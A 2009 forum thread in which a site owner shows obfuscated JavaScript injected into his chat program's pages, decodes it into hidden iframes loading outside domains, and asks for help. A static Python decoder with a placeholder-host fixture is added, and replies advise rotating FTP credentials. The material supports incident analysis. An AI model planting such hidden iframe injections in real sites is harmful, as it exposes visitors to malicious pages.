# Malicious code inserted on my website?



## dspguy (Jun 24, 2009)

I'm not really clear on what the proper term is for what I saw happen on my website. So forgive me if the thread title is misleading or incorrect.

Here is the short version:
I put a chat program (bluechat - cgi based) on my website for personal use in Dec 2008. It worked well until sometime in May 2009. When I open up the chat page, it seems to redirect to nuotoll.com. However, it sometimes will eventually open up the chat program anyway.

I assumed it was a PC problem at first, so I ran anti-spyware stuff, CCleaner, and checked for any DNS hijacks. The problem persisted. I then went to my website and checked the install folder where the chat program resides. The modification dates of two files (index.html and logo.htm) had been changed to May 20 2009. I opened up a copy of the files and did a diff with the original:

_from index.html_

```
<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,101,119,61,52,53,51,
56,48,48,53,52,51,59,118,97,114,32,103,104,103,52,53,61,34,110,117,111,116,34,59,118,
97,114,32,119,61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,108,46,34,59,118,97,
114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118
,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,
116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,
39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,
39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,
104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101
,62,39,41,59,32,118,97,114,32,106,104,114,52,61,52,51,50,52,50,50,52))</script>
```
I converted that to ASCII and got:

```
var xew=453800543;
var ghg45="nuot";var w="o";
var re6="ll.";
var h2h="com";
var a="ifr";
var s="htt";
document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>');
var jhr4=4324224
```
_from logo.htm_

```
</HTML><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,
61,34,115,105,34,59,118,97,114,32,119,51,52,53,61,34,112,108,34,59,118,97,114,32,114,
101,54,61,34,97,110,107,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,
114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,
109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,
114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,
43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113
,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,
115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,
109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>
```
Converting that to ASCII:

```
var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one"></if'+'rame>');
var t=00001217
```
Now, I see "nuotoll.com" in there somewhere. I also see "siplank.com" in there.

I guess my questions are:
1) How did this script get there without someone knowing my FTP info?
2) What exactly was that inserted code doing?
3) Is there a better (and free) chat program I could use instead?

Any help would be appreciated, thanks!
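A small triage helper for this kind of injection, added here as an example and not code from the post or from bluechat: it decodes every `String.fromCharCode(...)` blob in a file (tolerating the line wrapping seen above) and then statically folds the `document.write` concatenation to recover the injected iframe and its target, without ever executing the script. The fixture below is constructed, and `attacker.invalid` is a reserved placeholder host.

```python
import re

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]+)\)")
ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"')
WRITE = re.compile(r"document\.write\((.*?)\);", re.S)
TOKEN = re.compile(r"'([^']*)'|(\w+)")          # quoted literal | identifier
IFRAME_SRC = re.compile(r'<iframe[^>]*src="([^"]+)"', re.I)

def decode_fromcharcode(html):
    """Plaintext of every String.fromCharCode(...) blob in the file."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", blob))
            for blob in FROMCHARCODE.findall(html)]

def rebuild_document_write(script):
    """Fold the concatenation inside document.write(...) statically:
    substitute the var fragments and join the string literals."""
    names = dict(ASSIGN.findall(script))
    rebuilt = []
    for expr in WRITE.findall(script):
        parts = [lit if ident == "" else names.get(ident, "<?%s?>" % ident)
                 for lit, ident in TOKEN.findall(expr)]
        rebuilt.append("".join(parts))
    return rebuilt

def injected_urls(html):
    """Every iframe src hidden behind a fromCharCode/eval wrapper in the file."""
    urls = []
    for script in decode_fromcharcode(html):
        for markup in rebuild_document_write(script):
            urls.extend(IFRAME_SRC.findall(markup))
    return urls

# Constructed fixture: same shape as the snippet injected into index.html above
# (fragmented host name, document.write of a 1x3 iframe), placeholder host.
_PAYLOAD = (r'''var xew=453800543;var p1="atta";var p2="cker.";var tld="invalid";'''
            r'''var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+p1'''
            r'''+''+p2+''+tld+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>');var t=4324224''')
SAMPLE_HTML = ('<html><body>chat</body></html>\n<script type="text/javascript">'
               'eval(String.fromCharCode(' + ",\n".join(str(ord(c)) for c in _PAYLOAD)
               + '))</script>')

if __name__ == "__main__":
    for url in injected_urls(SAMPLE_HTML):
        print("injected iframe ->", url)   # prints: injected iframe -> http://attacker.invalid/
```

Pointing `injected_urls` at the real index.html and logo.htm from the post recovers the two hosts named there; anything the folder returns that you did not put in the file is a reason to rotate the FTP credentials and redeploy from a clean copy.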


----------



## Tact (Sep 9, 2002)

I MIGHT know what the script is doing (maybe...).

I probably used a form of it to try to keep my email hidden from bots.

The point of it is to mask the address by breaking it up into parts and using character map code to type in regular letters. This way, a regular user will see "email me at address.com" while a bot would see a bunch of code and hopefully not spam my inbox.

I'm not sure it works 'cause I get a bajillion spam a day anyway -_- and I'm not sure if the code is basically useless or if it's because Google Mail is weird like that. I'll never know.

Anyway, I THINK that's what somebody did to your site to redirect to some other sites. I wish I could help you more. What kind of sites were they? And did you delete the stuff after you found it?


----------



## Big-K (Nov 22, 2003)

How do you know for sure that they don't know your FTP information? Remove the offending material and change your credentials just to be sure, then see if it persists.


----------

